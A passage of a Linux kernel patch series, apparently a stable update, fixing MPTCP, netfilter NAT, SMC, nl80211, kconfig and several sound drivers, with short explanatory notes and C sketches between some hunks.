+ static struct inet_connection_sock_af_ops subflow_specific __ro_after_init;
+-static struct proto tcp_prot_override;
++static struct proto tcp_prot_override __ro_after_init;
+ 
+ enum mapping_status {
+ 	MAPPING_OK,
+@@ -1431,6 +1446,13 @@ static void subflow_error_report(struct sock *ssk)
+ {
+ 	struct sock *sk = mptcp_subflow_ctx(ssk)->conn;
+ 
++	/* bail early if this is a no-op, so that we avoid introducing a
++	 * problematic lockdep dependency between TCP accept queue lock
++	 * and msk socket spinlock
++	 */
++	if (!sk->sk_socket)
++		return;
++
+ 	mptcp_data_lock(sk);
+ 	if (!sock_owned_by_user(sk))
+ 		__mptcp_error_report(sk);
+@@ -1800,79 +1822,6 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
+-void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+-{
+-	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
+-	struct mptcp_sock *msk, *next, *head = NULL;
+-	struct request_sock *req;
+-
+-	/* build a list of all unaccepted mptcp sockets */
+-	spin_lock_bh(&queue->rskq_lock);
+-	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
+-		struct mptcp_subflow_context *subflow;
+-		struct sock *ssk = req->sk;
+-		struct mptcp_sock *msk;
+-
+-		if (!sk_is_mptcp(ssk))
+-			continue;
+-
+-		subflow = mptcp_subflow_ctx(ssk);
+-		if (!subflow || !subflow->conn)
+-			continue;
+-
+-		/* skip if already in list */
+-		msk = mptcp_sk(subflow->conn);
+-		if (msk->dl_next || msk == head)
+-			continue;
+-
+-		msk->dl_next = head;
+-		head = msk;
+-	}
+-	spin_unlock_bh(&queue->rskq_lock);
+-	if (!head)
+-		return;
+-
+-	/* can't acquire the msk socket lock under the subflow one,
+-	 * or will cause ABBA deadlock
+-	 */
+-	release_sock(listener_ssk);
+-
+-	for (msk = head; msk; msk = next) {
+-		struct sock *sk = (struct sock *)msk;
+-		bool do_cancel_work;
+-
+-		sock_hold(sk);
+-		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
+-		next = msk->dl_next;
+-		msk->first = NULL;
+-		msk->dl_next = NULL;
+-
+-		do_cancel_work = __mptcp_close(sk, 0);
+-		release_sock(sk);
+-		if (do_cancel_work) {
+-			/* lockdep will report a false positive ABBA deadlock
+-			 * between cancel_work_sync and the listener socket.
+-			 * The involved locks belong to different sockets WRT
+-			 * the existing AB chain.
+-			 * Using a per socket key is problematic as key
+-			 * deregistration requires process context and must be
+-			 * performed at socket disposal time, in atomic
+-			 * context.
+-			 * Just tell lockdep to consider the listener socket
+-			 * released here.
+-			 */
+-			mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
+-			mptcp_cancel_work(sk);
+-			mutex_acquire(&listener_sk->sk_lock.dep_map,
+-				      SINGLE_DEPTH_NESTING, 0, _RET_IP_);
+-		}
+-		sock_put(sk);
+-	}
+-
+-	/* we are still under the listener msk socket lock */
+-	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
+-}
+-
+ static int subflow_ulp_init(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+@@ -1929,6 +1878,13 @@ static void subflow_ulp_release(struct sock *ssk)
+ 		 * when the subflow is still unaccepted
+ 		 */
+ 		release = ctx->disposable || list_empty(&ctx->node);
++
++		/* inet_child_forget() does not call sk_state_change(),
++		 * explicitly trigger the socket close machinery
++		 */
++		if (!release && !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW,
++						  &mptcp_sk(sk)->flags))
++			mptcp_schedule_work(sk);
+ 		sock_put(sk);
+ 	}
+ 
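Two small hunks above also tighten tcp_prot_override and tcpv6_prot_override with __ro_after_init: both templates are written once while the subflow code initializes and never again, so the annotation lets the kernel map them read-only after boot, turning any later stray write into a fault. A hedged sketch of the idiom; the demo names are illustrative and the assignment stands in for whatever one-time setup the real code does.

	#include <linux/cache.h>
	#include <linux/init.h>

	/* written exactly once during boot, then mapped read-only */
	static int demo_tuning __ro_after_init;

	static int __init demo_setup(void)
	{
		demo_tuning = 42;	/* last legal write */
		return 0;
	}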
+diff --git a/net/netfilter/nft_masq.c b/net/netfilter/nft_masq.c
+index e55e455275c48..9544c2f16998b 100644
+--- a/net/netfilter/nft_masq.c
++++ b/net/netfilter/nft_masq.c
+@@ -43,7 +43,7 @@ static int nft_masq_init(const struct nft_ctx *ctx,
+ 			 const struct nft_expr *expr,
+ 			 const struct nlattr * const tb[])
+ {
+-	u32 plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	u32 plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	struct nft_masq *priv = nft_expr_priv(expr);
+ 	int err;
+ 
+diff --git a/net/netfilter/nft_nat.c b/net/netfilter/nft_nat.c
+index 0479991503900..5c29915ab0289 100644
+--- a/net/netfilter/nft_nat.c
++++ b/net/netfilter/nft_nat.c
+@@ -226,7 +226,7 @@ static int nft_nat_init(const struct nft_ctx *ctx, const struct nft_expr *expr,
+ 		priv->flags |= NF_NAT_RANGE_MAP_IPS;
+ 	}
+ 
+-	plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	if (tb[NFTA_NAT_REG_PROTO_MIN]) {
+ 		err = nft_parse_register_load(tb[NFTA_NAT_REG_PROTO_MIN],
+ 					      &priv->sreg_proto_min, plen);
+diff --git a/net/netfilter/nft_redir.c b/net/netfilter/nft_redir.c
+index 5f77399875593..67cec56bc84a3 100644
+--- a/net/netfilter/nft_redir.c
++++ b/net/netfilter/nft_redir.c
+@@ -48,7 +48,7 @@ static int nft_redir_init(const struct nft_ctx *ctx,
+ 	unsigned int plen;
+ 	int err;
+ 
+-	plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	if (tb[NFTA_REDIR_REG_PROTO_MIN]) {
+ 		err = nft_parse_register_load(tb[NFTA_REDIR_REG_PROTO_MIN],
+ 					      &priv->sreg_proto_min, plen);
+@@ -236,7 +236,7 @@ static struct nft_expr_type nft_redir_inet_type __read_mostly = {
+ 	.name		= "redir",
+ 	.ops		= &nft_redir_inet_ops,
+ 	.policy		= nft_redir_policy,
+-	.maxattr	= NFTA_MASQ_MAX,
++	.maxattr	= NFTA_REDIR_MAX,
+ 	.owner		= THIS_MODULE,
+ };
+ 
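All three netfilter hunks above fix the same copy-paste slip: the length passed to nft_parse_register_load() must be the size of the protocol union (a 16-bit port), not the address union (sized to hold an IPv6 address). sizeof_field() reads a member's size from the type alone, with no instance needed. A runnable userspace sketch with simplified stand-in unions; the real nf_nat_range layout has more members, so treat the exact sizes as illustrative.

	#include <stdio.h>

	/* same definition the kernel uses in <linux/stddef.h> */
	#define sizeof_field(TYPE, MEMBER) sizeof((((TYPE *)0)->MEMBER))

	/* simplified stand-ins for nf_inet_addr / nf_conntrack_man_proto */
	union demo_addr  { unsigned int ip; unsigned int ip6[4]; unsigned int all[4]; };
	union demo_proto { unsigned short port; unsigned short all; };

	struct demo_range {
		union demo_addr  min_addr;
		union demo_proto min_proto;
	};

	int main(void)
	{
		/* 16 vs 2 here: passing the address size over-reads the register */
		printf("min_addr.all:  %zu\n", sizeof_field(struct demo_range, min_addr.all));
		printf("min_proto.all: %zu\n", sizeof_field(struct demo_range, min_proto.all));
		return 0;
	}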
+diff --git a/net/smc/smc_cdc.c b/net/smc/smc_cdc.c
+index 53f63bfbaf5f9..89105e95b4523 100644
+--- a/net/smc/smc_cdc.c
++++ b/net/smc/smc_cdc.c
+@@ -114,6 +114,9 @@ int smc_cdc_msg_send(struct smc_connection *conn,
+ 	union smc_host_cursor cfed;
+ 	int rc;
+ 
++	if (unlikely(!READ_ONCE(conn->sndbuf_desc)))
++		return -ENOBUFS;
++
+ 	smc_cdc_add_pending_send(conn, pend);
+ 
+ 	conn->tx_cdc_seq++;
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c19d4b7c1f28a..0208dfb353456 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1459,7 +1459,7 @@ static void __smc_lgr_terminate(struct smc_link_group *lgr, bool soft)
+ 	if (lgr->terminating)
+ 		return;	/* lgr already terminating */
+ 	/* cancel free_work sync, will terminate when lgr->freeing is set */
+-	cancel_delayed_work_sync(&lgr->free_work);
++	cancel_delayed_work(&lgr->free_work);
+ 	lgr->terminating = 1;
+ 
+ 	/* kill remaining link group connections */
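The smc hunk drops the _sync suffix: cancel_delayed_work_sync() waits for a running instance of the work to finish, which can deadlock if the termination path is itself reachable from free_work, while plain cancel_delayed_work() only removes a queued instance; here the lgr->freeing flag already tells a running worker to stop on its own. A hedged kernel-style sketch of the distinction, with illustrative demo names.

	#include <linux/workqueue.h>

	static void demo_fn(struct work_struct *work);
	static DECLARE_DELAYED_WORK(demo_work, demo_fn);

	static void demo_teardown(void)
	{
		/* dequeue a pending instance without waiting; safe even if
		 * demo_fn() can call back into this teardown path
		 */
		cancel_delayed_work(&demo_work);
	}

	static void demo_fn(struct work_struct *work)
	{
		/* using cancel_delayed_work_sync() in demo_teardown() would
		 * self-deadlock whenever this function reaches demo_teardown()
		 */
		demo_teardown();
	}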
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 02b9a0280896c..e34491e63133d 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -8816,7 +8816,7 @@ static bool cfg80211_off_channel_oper_allowed(struct wireless_dev *wdev,
+ 		struct cfg80211_chan_def *chandef;
+ 
+ 		chandef = wdev_chandef(wdev, link_id);
+-		if (!chandef)
++		if (!chandef || !chandef->chan)
+ 			continue;
+ 
+ 		/*
+@@ -10700,8 +10700,7 @@ static int nl80211_crypto_settings(struct cfg80211_registered_device *rdev,
+ 
+ static struct cfg80211_bss *nl80211_assoc_bss(struct cfg80211_registered_device *rdev,
+ 					      const u8 *ssid, int ssid_len,
+-					      struct nlattr **attrs,
+-					      const u8 **bssid_out)
++					      struct nlattr **attrs)
+ {
+ 	struct ieee80211_channel *chan;
+ 	struct cfg80211_bss *bss;
+@@ -10728,7 +10727,6 @@ static struct cfg80211_bss *nl80211_assoc_bss(struct cfg80211_registered_device
+ 	if (!bss)
+ 		return ERR_PTR(-ENOENT);
+ 
+-	*bssid_out = bssid;
+ 	return bss;
+ }
+ 
+@@ -10738,7 +10736,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 	struct net_device *dev = info->user_ptr[1];
+ 	struct cfg80211_assoc_request req = {};
+ 	struct nlattr **attrs = NULL;
+-	const u8 *bssid, *ssid;
++	const u8 *ap_addr, *ssid;
+ 	unsigned int link_id;
+ 	int err, ssid_len;
+ 
+@@ -10875,6 +10873,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 			return -EINVAL;
+ 
+ 		req.ap_mld_addr = nla_data(info->attrs[NL80211_ATTR_MLD_ADDR]);
++		ap_addr = req.ap_mld_addr;
+ 
+ 		attrs = kzalloc(attrsize, GFP_KERNEL);
+ 		if (!attrs)
+@@ -10900,8 +10899,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 				goto free;
+ 			}
+ 			req.links[link_id].bss =
+-				nl80211_assoc_bss(rdev, ssid, ssid_len, attrs,
+-						  &bssid);
++				nl80211_assoc_bss(rdev, ssid, ssid_len, attrs);
+ 			if (IS_ERR(req.links[link_id].bss)) {
+ 				err = PTR_ERR(req.links[link_id].bss);
+ 				req.links[link_id].bss = NULL;
+@@ -10952,10 +10950,10 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 		if (req.link_id >= 0)
+ 			return -EINVAL;
+ 
+-		req.bss = nl80211_assoc_bss(rdev, ssid, ssid_len, info->attrs,
+-					    &bssid);
++		req.bss = nl80211_assoc_bss(rdev, ssid, ssid_len, info->attrs);
+ 		if (IS_ERR(req.bss))
+ 			return PTR_ERR(req.bss);
++		ap_addr = req.bss->bssid;
+ 	}
+ 
+ 	err = nl80211_crypto_settings(rdev, info, &req.crypto, 1);
+@@ -10968,7 +10966,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 			dev->ieee80211_ptr->conn_owner_nlportid =
+ 				info->snd_portid;
+ 			memcpy(dev->ieee80211_ptr->disconnect_bssid,
+-			       bssid, ETH_ALEN);
++			       ap_addr, ETH_ALEN);
+ 		}
+ 
+ 		wdev_unlock(dev->ieee80211_ptr);
+diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
+index 00afe831c71c4..f238048bf786e 100644
+--- a/net/xfrm/xfrm_state.c
++++ b/net/xfrm/xfrm_state.c
+@@ -2815,11 +2815,6 @@ int __xfrm_init_state(struct xfrm_state *x, bool init_replay, bool offload,
+ 			goto error;
+ 		}
+ 
+-		if (!(inner_mode->flags & XFRM_MODE_FLAG_TUNNEL)) {
+-			NL_SET_ERR_MSG(extack, "Only tunnel modes can accommodate an AF_UNSPEC selector");
+-			goto error;
+-		}
+-
+ 		x->inner_mode = *inner_mode;
+ 
+ 		if (x->props.family == AF_INET)
+diff --git a/scripts/kconfig/confdata.c b/scripts/kconfig/confdata.c
+index b7c9f1dd5e422..992575f1e9769 100644
+--- a/scripts/kconfig/confdata.c
++++ b/scripts/kconfig/confdata.c
+@@ -1226,10 +1226,12 @@ static void (*conf_changed_callback)(void);
+ 
+ void conf_set_changed(bool val)
+ {
+-	if (conf_changed_callback && conf_changed != val)
+-		conf_changed_callback();
++	bool changed = conf_changed != val;
+ 
+ 	conf_changed = val;
++
++	if (conf_changed_callback && changed)
++		conf_changed_callback();
+ }
+ 
+ bool conf_get_changed(void)
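The confdata hunk is a pure ordering fix: the callback used to fire while conf_changed still held the old value, so a callback consulting conf_get_changed() observed stale state. The rewrite records whether the value changed, publishes the new value, and only then notifies. A runnable sketch of the corrected sequence, using stand-ins for the kconfig globals.

	#include <stdbool.h>
	#include <stdio.h>

	static bool conf_changed;
	static void (*conf_changed_callback)(void);

	static void conf_set_changed(bool val)
	{
		bool changed = conf_changed != val;

		conf_changed = val;			/* publish state first */

		if (conf_changed_callback && changed)
			conf_changed_callback();	/* observers now read the new value */
	}

	static void observer(void)
	{
		printf("callback sees conf_changed=%d\n", conf_changed);
	}

	int main(void)
	{
		conf_changed_callback = observer;
		conf_set_changed(true);			/* prints 1, not 0 */
		return 0;
	}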
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index ae31bb1275940..317bdf6dcbef4 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -472,6 +472,15 @@ static const struct config_entry config_table[] = {
+ 	},
+ #endif
+ 
++/* Meteor Lake */
++#if IS_ENABLED(CONFIG_SND_SOC_SOF_METEORLAKE)
++	/* Meteorlake-P */
++	{
++		.flags = FLAG_SOF | FLAG_SOF_ONLY_IF_DMIC_OR_SOUNDWIRE,
++		.device = 0x7e28,
++	},
++#endif
++
+ };
+ 
+ static const struct config_entry *snd_intel_dsp_find_config
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 81c4a45254ff2..77a592f219472 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -328,14 +328,15 @@ enum {
+ #define needs_eld_notify_link(chip)	false
+ #endif
+ 
+-#define CONTROLLER_IN_GPU(pci) (((pci)->device == 0x0a0c) || \
++#define CONTROLLER_IN_GPU(pci) (((pci)->vendor == 0x8086) &&         \
++				       (((pci)->device == 0x0a0c) || \
+ 					((pci)->device == 0x0c0c) || \
+ 					((pci)->device == 0x0d0c) || \
+ 					((pci)->device == 0x160c) || \
+ 					((pci)->device == 0x490d) || \
+ 					((pci)->device == 0x4f90) || \
+ 					((pci)->device == 0x4f91) || \
+-					((pci)->device == 0x4f92))
++					((pci)->device == 0x4f92)))
+ 
+ #define IS_BXT(pci) ((pci)->vendor == 0x8086 && (pci)->device == 0x5a98)
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index d4819890374b5..28ac6c159b2a2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9446,6 +9446,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+@@ -9538,6 +9539,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x144d, 0xc830, "Samsung Galaxy Book Ion (NT950XCJ-X716A)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc832, "Samsung Galaxy Book Flex Alpha (NP730QCJ)", ALC256_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET),
+ 	SND_PCI_QUIRK(0x144d, 0xca03, "Samsung Galaxy Book2 Pro 360 (NP930QED)", ALC298_FIXUP_SAMSUNG_AMP),
++	SND_PCI_QUIRK(0x144d, 0xc868, "Samsung Galaxy Book2 Pro (NP930XED)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x1458, 0xfa53, "Gigabyte BXBT-2807", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb120, "MSI Cubi MS-B120", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb171, "Cubi N 8GL (MS-B171)", ALC283_FIXUP_HEADSET_MIC),
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 56ee5fef66a8b..28dd2046e4ac5 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -559,7 +559,7 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_machines[] = {
+ 	{
+ 		.comp_ids = &essx_83x6,
+ 		.drv_name = "sof-essx8336",
+-		.sof_tplg_filename = "sof-adl-es83x6", /* the tplg suffix is added at run time */
++		.sof_tplg_filename = "sof-adl-es8336", /* the tplg suffix is added at run time */
+ 		.tplg_quirk_mask = SND_SOC_ACPI_TPLG_INTEL_SSP_NUMBER |
+ 					SND_SOC_ACPI_TPLG_INTEL_SSP_MSB |
+ 					SND_SOC_ACPI_TPLG_INTEL_DMIC_NUMBER,
+diff --git a/sound/soc/qcom/qdsp6/q6prm.c b/sound/soc/qcom/qdsp6/q6prm.c
+index 8aa1a213bfb75..c1dc5bae715a0 100644
+--- a/sound/soc/qcom/qdsp6/q6prm.c
++++ b/sound/soc/qcom/qdsp6/q6prm.c
+@@ -183,9 +183,9 @@ int q6prm_set_lpass_clock(struct device *dev, int clk_id, int clk_attr, int clk_
+ 			  unsigned int freq)
+ {
+ 	if (freq)
+-		return q6prm_request_lpass_clock(dev, clk_id, clk_attr, clk_attr, freq);
++		return q6prm_request_lpass_clock(dev, clk_id, clk_attr, clk_root, freq);
+ 
+-	return q6prm_release_lpass_clock(dev, clk_id, clk_attr, clk_attr, freq);
++	return q6prm_release_lpass_clock(dev, clk_id, clk_attr, clk_root, freq);
+ }
+ EXPORT_SYMBOL_GPL(q6prm_set_lpass_clock);
+ 
+diff --git a/sound/soc/sof/intel/pci-apl.c b/sound/soc/sof/intel/pci-apl.c
+index 69279dcc92dc1..aff6cb573c270 100644
+--- a/sound/soc/sof/intel/pci-apl.c
++++ b/sound/soc/sof/intel/pci-apl.c
+@@ -78,6 +78,7 @@ static const struct sof_dev_desc glk_desc = {
+ 	.nocodec_tplg_filename = "sof-glk-nocodec.tplg",
+ 	.ops = &sof_apl_ops,
+ 	.ops_init = sof_apl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-cnl.c b/sound/soc/sof/intel/pci-cnl.c
+index 8db3f8d15b55e..4c0c1c369dcd8 100644
+--- a/sound/soc/sof/intel/pci-cnl.c
++++ b/sound/soc/sof/intel/pci-cnl.c
+@@ -48,6 +48,7 @@ static const struct sof_dev_desc cnl_desc = {
+ 	.nocodec_tplg_filename = "sof-cnl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc cfl_desc = {
+@@ -111,6 +112,7 @@ static const struct sof_dev_desc cml_desc = {
+ 	.nocodec_tplg_filename = "sof-cnl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-icl.c b/sound/soc/sof/intel/pci-icl.c
+index d6cf75e357dbf..6785669113b3c 100644
+--- a/sound/soc/sof/intel/pci-icl.c
++++ b/sound/soc/sof/intel/pci-icl.c
+@@ -79,6 +79,7 @@ static const struct sof_dev_desc jsl_desc = {
+ 	.nocodec_tplg_filename = "sof-jsl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-mtl.c b/sound/soc/sof/intel/pci-mtl.c
+index 6e4e6d4ef5a56..b183dc0014b4b 100644
+--- a/sound/soc/sof/intel/pci-mtl.c
++++ b/sound/soc/sof/intel/pci-mtl.c
+@@ -46,6 +46,7 @@ static const struct sof_dev_desc mtl_desc = {
+ 	.nocodec_tplg_filename = "sof-mtl-nocodec.tplg",
+ 	.ops = &sof_mtl_ops,
+ 	.ops_init = sof_mtl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-skl.c b/sound/soc/sof/intel/pci-skl.c
+index 3a99dc444f92e..5b4bccf819658 100644
+--- a/sound/soc/sof/intel/pci-skl.c
++++ b/sound/soc/sof/intel/pci-skl.c
+@@ -38,6 +38,7 @@ static struct sof_dev_desc skl_desc = {
+ 	.nocodec_tplg_filename = "sof-skl-nocodec.tplg",
+ 	.ops = &sof_skl_ops,
+ 	.ops_init = sof_skl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static struct sof_dev_desc kbl_desc = {
+@@ -61,6 +62,7 @@ static struct sof_dev_desc kbl_desc = {
+ 	.nocodec_tplg_filename = "sof-kbl-nocodec.tplg",
+ 	.ops = &sof_skl_ops,
+ 	.ops_init = sof_skl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-tgl.c b/sound/soc/sof/intel/pci-tgl.c
+index e80c4dfef85a5..22e769e0831d9 100644
+--- a/sound/soc/sof/intel/pci-tgl.c
++++ b/sound/soc/sof/intel/pci-tgl.c
+@@ -48,6 +48,7 @@ static const struct sof_dev_desc tgl_desc = {
+ 	.nocodec_tplg_filename = "sof-tgl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc tglh_desc = {
+@@ -110,6 +111,7 @@ static const struct sof_dev_desc ehl_desc = {
+ 	.nocodec_tplg_filename = "sof-ehl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adls_desc = {
+@@ -141,6 +143,7 @@ static const struct sof_dev_desc adls_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adl_desc = {
+@@ -172,6 +175,7 @@ static const struct sof_dev_desc adl_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adl_n_desc = {
+@@ -203,6 +207,7 @@ static const struct sof_dev_desc adl_n_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc rpls_desc = {
+@@ -234,6 +239,7 @@ static const struct sof_dev_desc rpls_desc = {
+ 	.nocodec_tplg_filename = "sof-rpl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc rpl_desc = {
+@@ -265,6 +271,7 @@ static const struct sof_dev_desc rpl_desc = {
+ 	.nocodec_tplg_filename = "sof-rpl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/ipc4-topology.h b/sound/soc/sof/ipc4-topology.h
+index 0aa87a8add5d3..2363a7cc0b57d 100644
+--- a/sound/soc/sof/ipc4-topology.h
++++ b/sound/soc/sof/ipc4-topology.h
+@@ -46,7 +46,7 @@
+ #define SOF_IPC4_NODE_INDEX_INTEL_SSP(x) (((x) & 0xf) << 4)
+ 
+ /* Node ID for DMIC type DAI copiers */
+-#define SOF_IPC4_NODE_INDEX_INTEL_DMIC(x) (((x) & 0x7) << 5)
++#define SOF_IPC4_NODE_INDEX_INTEL_DMIC(x) ((x) & 0x7)
+ 
+ #define SOF_IPC4_GAIN_ALL_CHANNELS_MASK 0xffffffff
+ #define SOF_IPC4_VOL_ZERO_DB	0x7fffffff
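The ipc4-topology hunk removes a stray shift from the DMIC node-index macro. Judging by the SSP macro just above it, each DAI type packs its index into a specific bit range of the node ID, and (((x) & 0x7) << 5) landed the DMIC index in the wrong bits; the fix leaves it in bits 0-2. A runnable before/after sketch; the field layout is inferred from the header, so treat it as illustrative.

	#include <stdio.h>

	#define NODE_INDEX_DMIC_OLD(x) (((x) & 0x7) << 5)	/* wrong field: bits 5-7 */
	#define NODE_INDEX_DMIC_NEW(x) ((x) & 0x7)		/* fixed: bits 0-2 */

	int main(void)
	{
		printf("old: 0x%02x  new: 0x%02x\n",
		       NODE_INDEX_DMIC_OLD(2), NODE_INDEX_DMIC_NEW(2)); /* old: 0x40  new: 0x02 */
		return 0;
	}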
+diff --git a/tools/testing/selftests/amd-pstate/Makefile b/tools/testing/selftests/amd-pstate/Makefile
+index 5fd1424db37d8..c382f579fe94a 100644
+--- a/tools/testing/selftests/amd-pstate/Makefile
++++ b/tools/testing/selftests/amd-pstate/Makefile
+@@ -4,10 +4,15 @@
+ # No binaries, but make sure arg-less "make" doesn't trigger "run_tests"
+ all:
+ 
+-uname_M := $(shell uname -m 2>/dev/null || echo not)
+-ARCH ?= $(shell echo $(uname_M) | sed -e s/i.86/x86/ -e s/x86_64/x86/)
++ARCH ?= $(shell uname -m 2>/dev/null || echo not)
++ARCH := $(shell echo $(ARCH) | sed -e s/i.86/x86/ -e s/x86_64/x86/)
+ 
+-TEST_PROGS := run.sh
+-TEST_FILES := basic.sh tbench.sh gitsource.sh
++ifeq (x86,$(ARCH))
++TEST_FILES += ../../../power/x86/amd_pstate_tracer/amd_pstate_trace.py
++TEST_FILES += ../../../power/x86/intel_pstate_tracer/intel_pstate_tracer.py
++endif
++
++TEST_PROGS += run.sh
++TEST_FILES += basic.sh tbench.sh gitsource.sh
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index f7900e75d2306..05400462c7799 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -10,12 +10,14 @@ endif
+ CLANG_TARGET_FLAGS_arm          := arm-linux-gnueabi
+ CLANG_TARGET_FLAGS_arm64        := aarch64-linux-gnu
+ CLANG_TARGET_FLAGS_hexagon      := hexagon-linux-musl
++CLANG_TARGET_FLAGS_i386         := i386-linux-gnu
+ CLANG_TARGET_FLAGS_m68k         := m68k-linux-gnu
+ CLANG_TARGET_FLAGS_mips         := mipsel-linux-gnu
+ CLANG_TARGET_FLAGS_powerpc      := powerpc64le-linux-gnu
+ CLANG_TARGET_FLAGS_riscv        := riscv64-linux-gnu
+ CLANG_TARGET_FLAGS_s390         := s390x-linux-gnu
+ CLANG_TARGET_FLAGS_x86          := x86_64-linux-gnu
++CLANG_TARGET_FLAGS_x86_64       := x86_64-linux-gnu
+ CLANG_TARGET_FLAGS              := $(CLANG_TARGET_FLAGS_$(ARCH))
+ 
+ ifeq ($(CROSS_COMPILE),)
